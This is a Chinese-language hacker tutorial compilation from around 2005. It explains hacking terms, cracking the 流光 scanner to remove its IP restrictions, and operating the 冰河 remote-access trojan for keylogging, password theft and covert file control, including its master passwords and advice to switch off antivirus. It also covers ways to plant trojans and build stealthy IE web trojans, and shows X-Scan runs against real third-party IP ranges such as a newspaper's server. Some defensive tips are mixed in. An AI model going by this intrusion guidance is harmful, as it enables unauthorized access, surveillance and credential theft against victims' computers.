3、病毒：这个我想不用解释了吧，相信大家都和它打过交道，病毒大多具有破坏性，传播性，隐秘性，潜伏性。

4、后门：这个就是入侵后为方便我们下次进入肉鸡方便点所留下的东西，亲切的称为后门，现在好点的后门有REDMAIN等。

5、CRACK：这个名词很容易和HACK混淆，但是许多人不理解CRACK这个东西，但是接触过软件破解的人一定了解这个词 CRACKER分析下就是软件破解者的意思(注意这里有多了个ER)，许多共享软件就是我们的CRACKER来完成破解的，就是现在俗称的XX软件破解版。

6、漏洞：这个名词相信也不用太多的介绍，根据字面意思也可以理解，就好象一个房子，门很结实，可是有个窗户却不好，这就很可能造成被别人进入，入侵是也是相对的，必须要有漏洞才可以入侵，这里顺便介绍下打补丁的意思，还是用上面的例子门很结实，可窗户不好，这里我们需要把窗户补上，就叫打补丁了，许多人问过我怎样知道自己的机器有漏洞？怎样打补丁？这里也回答下，首先介绍怎样检查自己奇迹有什么样的漏洞，有款工具简称为MBSA是微软公司针对windows系统的安全检测工具，大家可以去网上找到自己下下来检测下自己机器有什么样的漏洞，还介绍下微软的漏洞名称 MS05-001 MS05-002 这种形式的前面MS应为是微软的意思吧，05呢是2005年，001是在2005年第一个漏洞(不知道解释的对不，自己的理解)大家还可以下个金山毒霸，金山可以有个漏洞检测功能，还可以帮你补上相应的补丁，那么怎么打补丁呢?其实这个很简单，在微软的官方网站里可以输入 MS05-001(如果你有这个漏洞的话)微软就找出了响应的补丁，下载下来 安装下其实就可以了，呵呵，打补丁也不是什么困难的事情哦。

7、端口：这个是入侵是很重要的一个环节，端口这个东西就好象是我要买东西，需要在1号窗口来结帐，而开放的1号窗口就好比响应的端口，端口可以形象的比喻成窗口，呵呵，不同的端口开放了不同的服务，大家可以在网上找到端口对照表来看下不同的端口开放的是什么服务。

8、权限：这个东西和人权一个效果，我们有自己的权利，但是我们的权利不能超出自己的范围，比如法律可以控制人的生命，这种最高权限呢就是计算机中的 Admin权限 最高权限，法官呢是执行法律的人，比法律底点，这个呢就是SYSTEM权限，系统权限，以下每种人有着自己不同的权限，比如我们得到了个WEBSHELL权限，许多人不知道这个是什么权限，其实就是个WEB(网业)的管理权限，权限一般比较低，但是有时想得到个服务器的ADMIN权限，就可以先丛WEBSHELL权限来入手，也就是长说的提权。

广陵寒

黑客利器流光使用技巧

流光这款软件除了能够像X-Scan那样扫描众多 漏洞、弱口令外，还集成了常用的入侵工具，如字典工具、NT/IIS工具等，还独创了能够控制“肉鸡”进行扫描的“流光Sensor工具”和为“肉鸡”安装服务的“种植者”工具。


与X-Scan相比，流光的功能多一些，但操作起来难免繁杂。由于流光的功能过于强大，而且功能还在不断扩充中，因此流光的作者小榕限制了流光所能扫描的IP范围，不允许流光扫描国内IP地址，而且流光测试版在功能上也有一定的限制。但是，入侵者为了能够最大限度地使用流光，在使用流光之前，都需要用专门的破解程序对流光进行破解，去除IP范围和功能上的限制。

安装与打补丁完成后，打开流光，界面如图所示。


实例：使用流光高级扫描功能检测210.□.□.2到210.□.□.253网段主机的系统缺陷

步骤一：打开高级扫描向导、设置扫描参数。

在流光4.7主界面下，通过选择“文件（F）”→“高级扫描向导（W）”或使用快捷健“Ctrl+W”打开高级扫描向导。在“起始地址”和“结束地址”分别填入目标网段主机的开始和结束IP地址；在“目标系统”中选择预检测的操作系统类型；在“获取主机名”、“PING检查”前面打钩；在“检测项目”中，选择“全选”；选好后如图所示。[morningsky]


然后单击“下一步（N）”按钮，在图中选中“标准端口扫描”。


说明：

“标准端口扫描”：只对常见的端口进行扫描。

“自定端口扫描范围”：自定义端口范围进行扫描。

然后单击“下一步（N）”按钮，在图中进行设置。


设置好所有检测项目后，然后单击“下一步（N）”按钮来到图界面，选择“本地主机”，表示使用本机执行扫描任务。


步骤二：开始扫描。

在图1-69中单击“开始（S）”按钮进行扫描。在扫描过程中，如果想要停止，通过单击最下角的“取消”按钮来实现，不过需要相当一段时间才能真正地停止，所以建议一次不要扫太大的网段，如果因扫描时间过长而等不及，这时候再想让流光停下来是不容易的。

步骤三：查看扫描报告。

扫描结束后，流光会自动打开HTML格式的扫描报告，如图所示。


需要指出的是，在扫描完成后，流光不仅把扫描结果整理成报告文件，而且还把可利用的主机列在流光界面的最下方，如图所示。

木马工具详解+入门工具使用


现在我们来看看木马在黑客学习中的作用。首先学习者要明确木马究竟是什么，同时还要搞清楚木马的类型，并且学习一些流行的木马程序的用法，这是一个相辅相成的学习进程，当黑客利用漏洞进入服务器之后，就可以选择两条路：一、破坏系统、获得资料、显示自己；二、利用木马为自己开辟一个合法的登录账号、掌管系统、利用被入侵系统作为跳板继续攻击其他系统。

由此看来，木马程序是为第二种情况涉及的一种可以远程控制系统的程序，根据实现木马程序的目的，可以知道这种程序应该具有以下性质：

1、伪装性：程序将自己的服务端伪装成合法程序，并且具有诱惑力的让被攻击者执行，在程序被激活后，木马代码会在未经授权的情况下运行并装载到系统开始运行进程中；

2、隐藏性：木马程序通病毒程序一样，不会暴露在系统进程管理器内，也不会让使用者察觉到木马的存在，它的所有动作都是伴随其他程序的运行进行的，因此在一般情况下使用者很难发现系统中木马的存在；

3、破坏性：通过远程控制，黑客可以通过木马程序对系统中的文件进行删除、编辑操作，还可以进行诸如格式化硬盘、改变系统启动参数等恶性破坏操作；

4、窃密性：木马程序最大的特点就是可以窥视被入侵电脑上的所有资料，这不仅包括硬盘上的文件，还包括显示器画面、使用者在操作电脑过程中在硬盘上输入的所有命令等。

看了上面的介绍，学习者应该对木马程序的用途有了一个初步了解，并且区分清除木马程序和病毒之间的相同点和不同点，由于黑客手段的日益增多，许多新出现的黑客手段（例如 D.O.S）经常会让学习者思维混乱，但实际上这些新出现的黑客手段都是从最开始的溢出、木马演变出来的，因而对于初学者来说，并不需要急于接触过多的新技术，而是要对最基本的也是最有效的黑客技术进行深入学习。

一、木马的原理：

大多数木马程序的基本原理都是一样的，他们是由两个程序配合使用——被安装在入侵系统内的Server程序；另一个是对Server其控制作用的Client程序。学习者已经了解了木马和病毒的区别，大多数Server程序不会像病毒一样主动传播，而是潜伏在一些合法程序内部，然后由目标操作者亲手将其安装到系统中，虽然这一切都是没有经过目标操作者授权的，然而从某种程度上说，这的确是在经过诱惑后目标“心甘情愿”接收木马的，当Server安装成功后，黑客就可以通过Client控制程序对Server端进行各种操作了。

木马程序的Server端为了隐藏自己，必须在设计中做到不让自己显示到任务栏或者系统进程控制器中，同时还不会影响其他程序的正常运行，当使用者电脑处于断线状态下，Server段不会发送任何信息到预设的端口上，而会自动检测网络状态直到网络连接好，Server会通过email或者其他形式将Server端系统资料通知Client端，同时接收Client发送出来的请求。

二.木马实战：

先说国产木马老大，冰河-----你不得不了解的工具。

（编者残语：）说到冰河，也许在2005年的今天显得很落后，但冰河创造了一个时代，一个人人能做黑客的时代。使用方便简单，人人都能上手。图形界面，中文菜单，了解木马，先从了解远程控制软件冰河开始。

======================================================

使用冰河前，请注意：如果你的机器有杀毒软件，可能会出现病毒提示。说实话，他还真是一个病毒。呵呵。所以在使用前，请慎重考虑，出了问题，小编可担当不起。建议使用不管是客户端还是服务端都请关闭杀毒软件以达到更好的使用效果。

======================================================

软件功能概述:

该软件主要用于远程监控，具体功能包括:

1．自动跟踪目标机屏幕变化，同时可以完全模拟键盘及鼠标输入,即在同步被控端屏幕变化的同时，监控端的一切键盘及鼠标操作将反映在被控端屏幕(局域网适用)；

2．记录各种口令信息：包括开机口令、屏保口令、各种共享资源口令及绝大多数在对话框中出现过的口令信息，且1.2以上的版本中允许用户对该功能自行扩充，2.0以上版本还同时提供了击键记录功能；

3．获取系统信息：包括计算机名、注册公司、当前用户、系统路径、操作系统版本、当前显示分辨率、物理及逻辑磁盘信息等多项系统数据；

4．限制系统功能：包括远程关机、远程重启计算机、锁定鼠标、锁定系统热键及锁定注册表等多项功能限制；

5．远程文件操作：包括创建、上传、下载、复制、删除文件或目录、文件压缩、快速浏览文本文件、远程打开文件（提供了四中不同的打开方式——正常方式、最大化、最小化和隐藏方式）等多项文件操作功能；

6．注册表操作：包括对主键的浏览、增删、复制、重命名和对键值的读写等所有注册表操作功能；

7．发送信息：以四种常用图标向被控端发送简短信息；

8．点对点通讯：以聊天室形式同被控端进行在线交谈。

一.文件列表:

1. G_Server.exe: 被监控端后台监控程序(运行一次即自动安装，可任意改名)，在安装前可以先通过'G_Client'的'配置本地服务器程序'功能进行一些特殊配置，例如是否将动态IP发送到指定信箱、改变监听端口、设置访问口令等)；

2. G_Client.exe: 监控端执行程序，用于监控远程计算机和配置服务器程序。

二.准备工作:

冰河是一个基于TCP/IP协议和WINDOWS操作系统的网络工具，所以首先应确保该协议已被安装且网络连接无误，然后配置服务器程序(如果不进行配置则取默认设置)，并在欲监控的计算机上运行服务器端监控程序即可。

三.升级方法:

由于冰河2.0的改版较大，所以2.0以后版本与以前各版本完全不兼容。为此只能向老用户提供一套升级方案：对于1.1版本的用户(好象已经没什么人用了)，可以先用1.1或1.2版的CLIENT端将新版本的SERVER程序上传至被监控端，然后执行'文件打开'命令即可；对于1.2版本的用户相对简单，只要通过1.2版的CLIENT远程打开新版本的SERVER程序就可以自动升级了。2.0以后的各版本完全兼容。

'DARKSUN专版'中还提供了另一种升级方法，可以免去在不同版本中切换的麻烦。如果您不能确定远程主机的冰河版本，在用'文件管理器'浏览目录前，最好先在工具栏下的'当前连接'列表框中选择打算连接的主机，然后直接点'升级1.2版本'按钮进行升级，如果返回的信息是'无法解释的命令'，那说明远程主机安装了2.0以上版本，具体的版本及系统信息可以通过'命令控制台'的'口令类命令\系统信息及口令\系统信息'来查看。

四.各模块简要说明:

安装好服务器端监控程序后，运行客户端程序就可以对远程计算机进行监控了，客户端执行程序的各模块功能如下:

1. "添加主机": 将被监控端IP地址添加至主机列表，同时设置好访问口令及端口，设置将保存在'Operate.ini'文件中，以后不必重输。如果需要修改设置，可以重新添加该主机，或在主界面工具栏内重新输入访问口令及端口并保存设置；

2. "删除主机": 将被监控端IP地址从主机列表中删除(相关设置也将同时被清除)；

3. "自动搜索": 搜索指定子网内安装有'冰河'的计算机。(例如欲搜索IP地址'192.168.1.1'至'192.168.1.255'网段的计算机，应将'起始域'设为'192.168.1',将'起始地址'和'终止地址'分别设为'1'和'255')；

4. "查看屏幕": 查看被监控端屏幕(相当于命令控制台中的'控制类命令\捕获屏幕\查看屏幕')；

5. "屏幕控制": 远程模拟鼠标及键盘输入(相当于命令控制台中的'控制类命令\捕获屏幕\屏幕控制')。其余同"查看屏幕"；

6. "冰河信使": 点对点聊天室，也就是传说中的'二人世界'；

7. "升级1.2版本": 通过'DARKSUN专版'的冰河来升级远程1.2版本的服务器程序；

8. "修改远程配置": 在线修改访问口令、监听端口等服务器程序设置，不需要重新上传整个文件，修改后立即生效；

9. "配置本地服务器程序": 在安装前对'G_Server.exe'进行配置(例如是否将动态IP发送到指定信箱、改变监听端口、设置访问口令等)。

五.文件管理器操作说明:

文件管理器对文件操作提供了下列鼠标操作功能：

1. 文件上传：右键单击欲上传的文件，选择'复制'，在目的目录中粘贴即可。也可以在目的目录中选择'文件上传自'，并选定欲上传的文件；

2. 文件下载：右键单击欲下载的文件，选择'复制'，在目的目录中粘贴即可。也可以在选定欲下载的文件后选择'文件下载至'，并选定目的目录及文件名；

3. 打开远程或本地文件：选定欲打开的文件,在弹出菜单中选择'远程打开'或'本地打开'，对于可执行文件若选择了'远程打开'，可以进一步设置文件的运行方式和运行参数(运行参数可为空)；

4. 删除文件或目录：选定欲删除的文件或目录，在弹出菜单中选择'删除'；

5. 新建目录：在弹出菜单中选择'新建文件夹'并输入目录名即可；

6. 文件查找：选定查找路径,在弹出菜单中选择'文件查找'，并输入文件名即可(支持通配符)；

7. 拷贝整个目录(只限于被监控端本机)：选定源目录并复制，选定目的目录并粘贴即可。

六.命令控制台主要命令:

1. 口令类命令: 系统信息及口令、历史口令、击键记录；

2. 控制类命令: 捕获屏幕、发送信息、进程管理、窗口管理、鼠标控制、系统控制、其它控制(如'锁定注册表'等)；

3. 网络类命令: 创建共享、删除共享、查看网络信息；

4. 文件类命令: 目录增删、文本浏览、文件查找、压缩、复制、移动、上传、下载、删除、打开(对于可执行文件则相当于创建进程)；

5. 注册表读写: 注册表键值读写、重命名、主键浏览、读写、重命名；

6. 设置类命令: 更换墙纸、更改计算机名、读取服务器端配置、在线修改服务器配置。

七.使用技巧:

1. 用'查看屏幕'命令抓取对方屏幕信息后,若希望程序自动跟踪对方的屏幕变化,在右键弹出菜单中选中'自动跟踪'项即可；

2. 在文件操作过程中,鼠标双击本地文件将在本地开该文件；鼠标双击远程文件将先下载该文件至临时目录,然后在本地打开；

3. 在使用'网络共享创建'命令时，如果不希望其他人看到新创建的共享名，可以在共享名后加上'$'符号。自己欲浏览时只要在IE的地址栏或'开始菜单'的'运行'对话框内键入'\\[机器名]\[共享名(含'$'符号)]即可；

4. 在1.2以后的版本中允许用户设定捕获图像的色深(1~7级)，图像将按设定保存为2的N次方种颜色(N=2的[1~7]次方)，即1级为单色，2级为16色，3级为256色，依此类推。

需要说明的是如果将色深设为0或8则表示色深依被监控端当前的分辨率而定，适当减小色深可以提高图像的传输速度。

2.1以后的版本新增了以JPEG格式传输图像的功能，以利于在INTERNET上传输图像，但这项功能只适用于2.1以上版本(制被控端)，否则实际上仍是通过BMP图象格式传输，所以请先确认版本后再使用。

八.常见问题:

1. 安装不成功，该问题通常是由于TCP/IP协议安装或设置不正确所致；

2. 被监控端启动时或与监控端连接时弹出'建立连接'对话框，该问题是由于系统设置了自动拨号属性。可以通过安装前定制服务器程序来禁止自动拨号；

3. 可以连接但没有反应，通常是版本不匹配所致，因为1.2以前的版本设计上存在缺陷，所以如果您不能确定远程主机的冰河版本，最好先按照前面所说的升级办法试一下，否则被监控端可能会出现错误提示。另外冰河没有提供代理功能，局域网外无法监控局域网内的机器，除非被控端是网关；

4. '更换墙纸'命令无效，这个问题的可能性太多了，较常见的原因是被监控端的桌面设置为'按WEB页查看'；

5. 对被监控端进行文件或目录的增删操作后，少数情况不会自动刷新，可以通过[Ctrl+R]或选择弹出菜单的'刷新'命令手动刷新；

6. 开机口令不正确，因为CMOS口令是单向编码，所以编码后的口令是不可逆也是不唯一的，冰河通过穷举算出来的口令可能与原口令不符，但也是有效口令。毛主席说过没有调查就没有发言权，所以没有试过就千万别妄下定论；

7. 占用系统资源过高，其实准确的说应该是CPU利用率过高，系统资源占用并不算过分，这主要是不断探测口令信息(敏感字符)造成的，所以在'DARKSUN专版'中允许用户将该功能屏蔽(我实在不知道怎样才能兼顾鱼和熊掌)，只要在配置时清空'敏感字符'中的所有字符串就行了。

8. 如何卸载冰河，这是我解答次数最多的一个问题，其实冰河1.2正式版以后的各版本都在CLIENT端提供了彻底的卸载功能。对于1.2版本，请执行命令列表中的'自动卸载'命令，对其以后的版本，请执行'命令控制台'中的'控制类命令\系统控制\自动卸载冰河'。

小编有言：说说卸冰河木马方法和冰河的通用密码

很多朋友问我中了木马“冰河”有什么方法可以卸掉，其实很简单，有两个方法：

（1）用杀毒软件“金山毒霸”就可以卸掉。但有朋友说用“金山”卸掉“冰河”后
打不开本文文件了，那你可以用手动方法去卸。如果你觉得那个办法太麻烦，可以用我介绍的第二种方法。

（2）用“冰河”卸“冰河”： 如果你确定你的机器种了冰河，那你上网后开启冰河。 在增添主机那里添自己的IP。 然后电击自己的IP， 选命令控制台那里选控制命令里的系统命令。 然后自己看啦。不要再说你不会啊。我会晕的啊。：）

冰河通用密码

3.0版：yzkzero.51.net

3.0版：yzkzero!

3.1-netbug版密码: 123456!@

2.2杀手专版：05181977

2.2杀手专版：dzq2000!

文：残

了解如何种植木马才能防止别人种植木马。看看一般人用的手段。（本文比较适合入门级别选手）

1.网吧种植

这个似乎在以前很流行，先关闭网吧的放火墙，再安装木马客户端，立刻结帐下机，注意，重点是不要重起机器，因为现在网吧都有还原精灵，所以在不关机器的情况下，木马是不会给发现的。因此，在网吧上网，首先要重起机器，其次看看杀毒软件有没有打开。最后建议，不要在网吧打开有重要密码的东西，如网络银行等。毕竟现在木马客户端躲避防火墙的能力很强，其次是还存在其他的病毒。

2.通讯软件传送

发一条消息给你，说，“这个我的照片哦，快看看。”当你接受并打开的时候，你已经中了木马了。（此时，你打开的文件好象“没有任何反应”）“她”可能接着说说：“呀，发错了。再见。”防御：不要轻易接受别人传的东西，其次是打开前要用杀毒软件查毒。

3.恐怖的捆绑

捆绑软件现在很多，具体使用就是把木马客户端和一个其他文件捆绑在一起（拿JPG图象为例），你看到的文件可能是.jpg，图标也是正常（第2条直接传的木马客户端是个windows无法识别文件的图标，比较好认），特别是现在有些捆绑软件对捆绑过后的软件进行优化，杀毒软件很难识别其中是否包含木马程序。建议：不要打开陌生人传递的文件。特别是图象文件。（诱惑力大哦）

4.高深的编译

对木马客户程序进行编译。让木马更加难以识别。（其实效果同第三条）

5.微妙的网页嵌入

将木马安装在自己的主页里面，当你打开页面就自动下载运行。（见下篇，打造网页木马）“你中奖了，请去www.**.com领取你的奖品”，黑客可能这么和你说。建议：陌生人提供的网页不要打开，不要去很奇怪名字的网站。及时升级杀毒软件。

总结：及时升级杀毒软件。不要打开未知文件以及陌生人传来的文件。不要随便打开陌生网页。升级最新版本的操作系统。还有....请看本专题以后的文章咯。

============================================================


你也可以当黑客 打造完美的IE网页木马


（残语：比较适合黑客中级选手，日后将推出视频教程）

既然要打造完美的IE网页木马，首先就必须给我们的完美制定一个标准，我个人认为一个完美的ＩＥ网页木马至少应具备下列四项特征：

一：可以躲过杀毒软件的追杀；

二：可以避开网络防火墙的报警；

三：能够适用于多数的Windows操作系统（主要包括Windows 98、Windows Me、Windows 2000、Windows XP、Windows 2003）中的多数IE版本（主要包括IE5.0、IE5.5、IE6.0），最好能打倒SP补丁；

四：让浏览者不容易发觉IE变化，即可以悄无声息，从而可以长久不被发现。

（注意以上四点只是指网页本身而言，但不包括你的木马程序，也就是说我们的网页木马只是负责运行指定的木马程序，至于你的木马程序的好坏只有你自己去选择啦！别找我要，我不会写的哦！）

满足以上四点我想才可以让你的马儿更青春更长久，跑的更欢更快……

看了上面的几点你是不是心动拉？别急，我们还是先侃侃现有的各种ＩＥ网页木马的不足吧！

第一种：利用古老的MIME漏洞的ＩＥ网页木马

这种木马现在还在流行，但因为此漏洞太过古老且适用的ＩＥ版本较少，而当时影响又太大，补丁差不多都补上啦，因此这种木马的种植成功率比较低。

第二种：利用com.ms.activeX.ActiveXComponent漏洞，结合ＷＳＨ及ＦＳＯ控件的ＩＥ网页木马

虽然com.ms.activeX.ActiveXComponent漏洞广泛存在于多数ＩＥ版本中，是一个比较好的漏洞，利用价值非常高，但却因为它结合了流行的病毒调用的ＷＳＨ及ＦＳＯ控件，使其虽说可以避开网络防火墙的报警，可逃不脱杀毒软件的追捕（如诺顿）。

第三种：利用OBJECT对象类型确认漏洞（ＯｂｊｅｃｔＤａｔａＲｅｍｏｔｅ）并结合ＷＳＨ及ＦＳＯ控件的ＩＥ网页木马（典型的代表有动鲨网页木马生成器）

此种木马最大的优点是适应的ＩＥ版本多，且漏洞较新，但却有如下不足：

１、因为此漏洞要调用Mshta.exe来访问网络下载木马程序，所以会引起防火墙报警（如天网防火墙）；

２、如果此ＩＥ网页木马又利用了ＷＳＨ及ＦＳＯ控件，同样逃不脱杀毒软件的追捕（如诺顿），而动鲨网页木马又恰恰使用了ＷＳＨ及ＦＳＯ控件，叹口气……可惜呀……？

３、再有就是这个漏洞需要网页服务器支持动态网页如ＡＳＰ、ＪＳＰ、ＣＧＩ等，这就影响了它的发挥，毕竟现在的免费稳定的动态网页空间是少之又少；虽说此漏洞也可利用邮件ＭＩＭＥ的形式来利用，但经测试发现对ＩＥ６．０不起作用。

看到上面的分析你是不是有了这种感觉：千军易得，一将难求，马儿成群，奈何千里马难寻！别急，下面让我带这大家一起打造我心中的完美ＩＥ网页木马。

=======================================================


扫描器的使用


这里我使用x-scanner作为介绍对象，原因是x-scanner集成了多种扫描功能于一身，它可以采用多线程方式对指定IP地址段（或独立IP地址）进行安全漏洞扫描，提供了图形界面和命令行两种操作方式，扫描内容包括：标准端口状态及端口banner信息、CGI漏洞、RPC漏洞、SQL-SERVER默认帐户、FTP弱口令，NT主机共享信息、用户信息、组信息、NT主机弱口令用户等。扫描结果保存在/log/目录中，index_*.htm为扫描结果索引文件。对于一些已知的CGI和RPC漏洞，x-scanner给出了相应的漏洞描述、利用程序及解决方案，节省了查找漏洞介绍的时间。

首先x-scanner包括了两个运行程序：xscann.exe和xscan_gui.exe，这两个程序分别是扫描器的控制台版本和窗口版本，作为初学者可能更容易接受窗口版本的扫描软件，因为毕竟初学者使用最多的还是“应用程序”，无论运行那一个版本，他们的功能都是一样的。首先让我们运行窗口版本看看：窗口分为左右两部分，左面是进行扫描的类型，这包括前面提到的漏洞扫描、端口扫描等基本内容；另一部分是有关扫描范围的设定，xscanner可以支持对多个IP地址的扫描，也就是说使用者可以利用xscanner成批扫描多个IP地址，例如在IP地址范围内输入211.100.8.1-211.100.8.255就会扫描整个C类的255台服务器（如果存在的话），这样黑客可以针对某一个漏洞进行搜索，找到大范围内所有存在某个漏洞的服务器。当然如果只输入一个IP地址，扫描程序将针对单独IP进行扫描。

剩下的端口设定在前面已经介绍过，一般对于网站服务器，这个端口选取80或者8080，对于某些特殊的服务器也许还有特殊的端口号，那需要通过端口扫描进行寻找。多线程扫描是这个扫描器的一大特色，所谓多线程就是说同时在本地系统开辟多个socket连接，在同一时间内扫描多个服务器，这样做的好处是提高了扫描速度，节省时间，根据系统的资源配置高低，线程数字也可以自行设定（设定太高容易造成系统崩溃）。

在图形界面下我们看到了程序连接地址“.\xscan.exe”，这实际上就是xscanner的控制台程序，也就是说图形窗口只是将控制台扫描器的有关参数设置做了“傻瓜化”处理，程序运行真正执行的还是控制台程序。因此学习控制台是黑客所必需的，而且使用控制台模式的程序也是真正黑客喜爱的操作方式。

现在我们进行一个简单的cgi漏洞扫描，这次演练是在控制台模式下进行的：xscan 211.100.8.87 -port

这个命令的意思是让xscanner扫描服务器211.100.8.87的开放端口，扫描器不会对65535个端口全部进行扫描（太慢），它只会检测网络上最常用的几百个端口，而且每一个端口对应的网络服务在扫描器中都已经做过定义，从最后返回的结果很容易了解服务器运行了什么网络服务。扫描结果显示如下：

Initialize dynamic library succeed.

Scanning 211.100.8.87 ......

[211.100.8.87]: Scaning port state ...

[211.100.8.87]: Port 21 is listening!!!

[211.100.8.87]: Port 25 is listening!!!

[211.100.8.87]: Port 53 is listening!!!

[211.100.8.87]: Port 79 is listening!!!

[211.100.8.87]: Port 80 is listening!!!

[211.100.8.87]: Port 110 is listening!!!

[211.100.8.87]: Port 3389 is listening!!!

[211.100.8.87]: Port scan completed, found 7.

[211.100.8.87]: All done.

这个结果还会同时在log目录下生成一个html文档，阅读文档可以了解发放的端口对应的服务项目。从结果中看到，这台服务器公开放了七个端口，主要有21端口用于文件传输、80端口用于网页浏览、还有110端口用于pop3电子邮件，如此一来，我们就可以进行有关服务的漏洞扫描了。(关于端口的详细解释会在后续给出)

然后可以使用浏览看看这个服务器到底是做什么的，通过浏览发现原来这是一家报社的电子版面，这样黑客可以继续对服务器进行漏洞扫描查找服务器上是否存在perl漏洞，之后进行进一步进攻。

漏洞扫描的道理和端口扫描基本上类似，例如我们可以通过扫描器查找61.135.50.1到61.135.50.255这255台服务器上所有开放了80端口的服务器上是否存在漏洞，并且找到存在什么漏洞，则可以使用xscan 61.135.50.1-61.135.50.255 -cgi进行扫描，因为结果比较多，通过控制台很难阅读，这个时候xscanner会在log下生成多个html的中文说明，进行阅读这些文档比较方便。

广陵寒

二、扫描器使用问题：

载使用漏洞扫描器的过程中，学习者可能会经常遇到一些问题，这里给出有关问题产生的原因和解决办法。扫描器的使用并不是真正黑客生涯的开始，但它是学习黑客的基础，所以学习者应该多加练习，熟练掌握手中使用的扫描器，了解扫描器的工作原理和问题的解决办法。

1、为什么我找不到扫描器报告的漏洞？

扫描器报告服务器上存在某个存在漏洞的文件，是发送一个GET请求并接收服务器返回值来判断文件是否存在，这个返回值在HTTP的协议中有详细的说明，一般情况下“200”是文件存在，而“404”是没有找到文件，所以造成上面现象的具体原因就暴露出来了。

造成这个问题的原因可能有两种：第一种可能性是您的扫描器版本比较低，扫描器本身存在“千年虫”问题，对于返回的信息扫描器在判断的时候，会错误的以为时间信息2000年x月x日中的200是“文件存在”标志，这样就会造成误报；

另外一种可能性是服务器本身对“文件不存在”返回的头部信息进行了更改，如果GET申请的文件不存在，服务器会自动指向一个“没有找到页面”的文档，所以无论文件是否存在，都不会将“404”返回，而是仍然返回成功信息，这样做是为了迷惑漏洞扫描器，让攻击者不能真正判断究竟那个漏洞存在于服务器上。

这一问题的解决办法也要分情况讨论，一般说来第一种情况比较容易解决，直接升级漏洞扫描器就可以了，对于第二种情况需要使用者对网络比较熟悉，有能力的话可以自己编写一个漏洞扫描器，自己编写的扫描器可以针对返回文件的大小进行判断，这样就可以真正确定文件是否存在，但这种方法对使用者的能力要求较高。

2、我使用的扫描器速度和网络速度有关系嘛？

关系不大。扫描器发送和接收的信息都很小，就算是同时发送上百个GET请求一般的电话上网用户也完全可以做得到，影响扫描器速度的主要因素是服务器的应答速度，这取决于被扫描服务器的系统运行速度。如果使用者希望提高自己的扫描速度，可以使用支持多线程的扫描器，但是因为使用者本地电脑档次问题，也不可能将线程设置到上百个，那样的话会造成本地系统瘫痪，一般使用30个线程左右比较合适。

另外对于很多网络服务器来说，为了防止黑客的扫描行为，可能会在防火墙上设置同一IP的单位时间GET申请数量，这样做目的就是避免黑客的扫描和攻击，所以在提高本地扫描速度之前，应该先确认服务器没有相应的过滤功能之后再使用。

3、扫描器报告给我的漏洞无法利用是什么原因？

确切地说扫描器报告的不是“找到的漏洞”，而是找到了一个可能存在漏洞的文件，各种网络应用程序都可能存在漏洞，但是在更新版本的过程中，老版本的漏洞会被修补上，被扫描器找到的文件应该经过手工操作确认其是否是存在漏洞的版本，这可以通过阅读网络安全网站的“安全公告”获得相应知识。

对于已经修补上漏洞的文件来说，也不代表它一定不再存有漏洞，而只能说在一定程度上没有漏洞了，也许在明天，这个新版本的文件中又会被发现还存在其他漏洞，因此这需要网络安全爱好者时刻关注安全公告。当然如果攻击者或者网络管理员对编程比较熟悉，也可以自己阅读程序并力图自己找到可能的安全隐患，很多世界著名的黑客都是不依*他人，而是自己寻找漏洞进行攻击的。

4、扫描器版本比较新，然而却从来没有找到过漏洞是什么原因？

有一些扫描器专门设计了“等待时间”，经过设置可以对等待返回信息的时间进行调整，这就是说在“网络连接超时”的情况下，扫描器不会傻傻的一直等待下去。但如果你的网络速度比较慢，有可能造成扫描器没有来得及接收返回信息就被认为“超时”而越了过去继续下面的扫描，这样当然是什么也找不到啦。

如果问题真的如此，可以将等待时间设置的长一些，或者换个ISP拨号连接。

5、扫描器报告服务器没有提供HTTP服务？

网络上大多数HTTP服务器和漏洞扫描器的默认端口都是80，而有少量的HTTP服务器并不是使用80端口提供服务的，在确认服务器的确开通了网站服务的情况下，可以用端口扫描器察看一下对方究竟使用什么端口进行的HTTP服务，网络上常见的端口还有8080。

另外这种情况还有一种可能性，也许是使用者对扫描器的参数设置不正确造成的，很多扫描器的功能不仅仅是漏洞扫描，有可能还提供了rpc扫描、ftp默认口令扫描和NT弱口令扫描等多种功能，因此在使用每一款扫描器之前，都应该自己阅读有关的帮助说明，确保问题不是出在自己身上。

6、扫描器使用过程中突然停止响应是为什么？

扫描器停止响应是很正常的，有可能是因为使用者连接的线程过多，本地系统资源不足而造成系统瘫痪、也可能是因为对方服务器的响应比较慢，依次发送出去的请求被同时反送回来而造成信息阻塞、还有可能是服务器安装了比较恶毒的防火墙，一旦察觉有人扫描就发送特殊的数据报回来造成系统瘫痪……

因此扫描器停止响应不能简单的说是为什么，也没有一个比较全面的解决方案，不过一般情况下遇到这种问题，我建议你可以更换其他扫描器、扫描另外一些服务器试试，如果问题还没有解决，就可能是因为扫描器与你所使用的系统不兼容造成的，大多数基于微软视窗的漏洞扫描器都是运行在Windows9X下的，如果是Win2000或者NT也有可能造成扫描器无法正常工作。

7、下载回来的扫描器里面怎么没有可执行文件？

扫描器不一定非要是可执行的exe文件，其他例如perl、cgi脚本语言也可以编写扫描器，因此没有可执行文件的扫描器也许是运行在网络服务器上的，这种扫描器可以被植入到网络上的其它系统中，不需要使用者上网就能够24小时不停的进行大面积地址扫描，并将结果整理、分析，最后通过Email发送到指定的电子信箱中，因此这是一种比较高级的扫描器，初学者不适合使用。

另外注意载下在扫描器的时候注意压缩报文件的扩展名，如果是tar为扩展名，那么这个扫描器是运行在Linux系统下的，这种其它操作平台的扫描器无法在视窗平台下应用，文件格式也和FAT32不一样。

8、扫描器只报告漏洞名称，不报告具体文件怎么办？

只要漏洞被发现，网络安全组织即会为漏洞命名，因此漏洞名称对应的文件在相当广泛的范围内都是统一的，只要知道了漏洞的名称，黑客就可以通过专门的漏洞搜索引擎进行查找，并且学习到与找到漏洞相关的详细信息。这种“漏洞搜索引擎”在网络上非常多，例如我国“绿盟”提供的全中文漏洞搜索引擎就是比较理想的一个。

===========================================================


如何防范黑客

黑客对服务器进行扫描是轻而易举的，一旦找到了服务器存在的问题，那么后果将是严重的。这就是说作为网络管理员应该采取不要的手段防止黑客对服务器进行扫描，本节我将谈谈如何才能让自己的服务器免遭黑客扫描。

一、防范黑客心得体会：

1、屏蔽可以IP地址：

这种方式见效最快，一旦网络管理员发现了可疑的IP地址申请，可以通过防火墙屏蔽相对应的IP地址，这样黑客就无法在连接到服务器上了。但是这种方法有很多缺点，例如很多黑客都使用的动态IP，也就是说他们的IP地址会变化，一个地址被屏蔽，只要更换其他IP仍然可以进攻服务器，而且高级黑客有可能会伪造IP地址，屏蔽的也许是正常用户的地址。

2、过滤信息包：

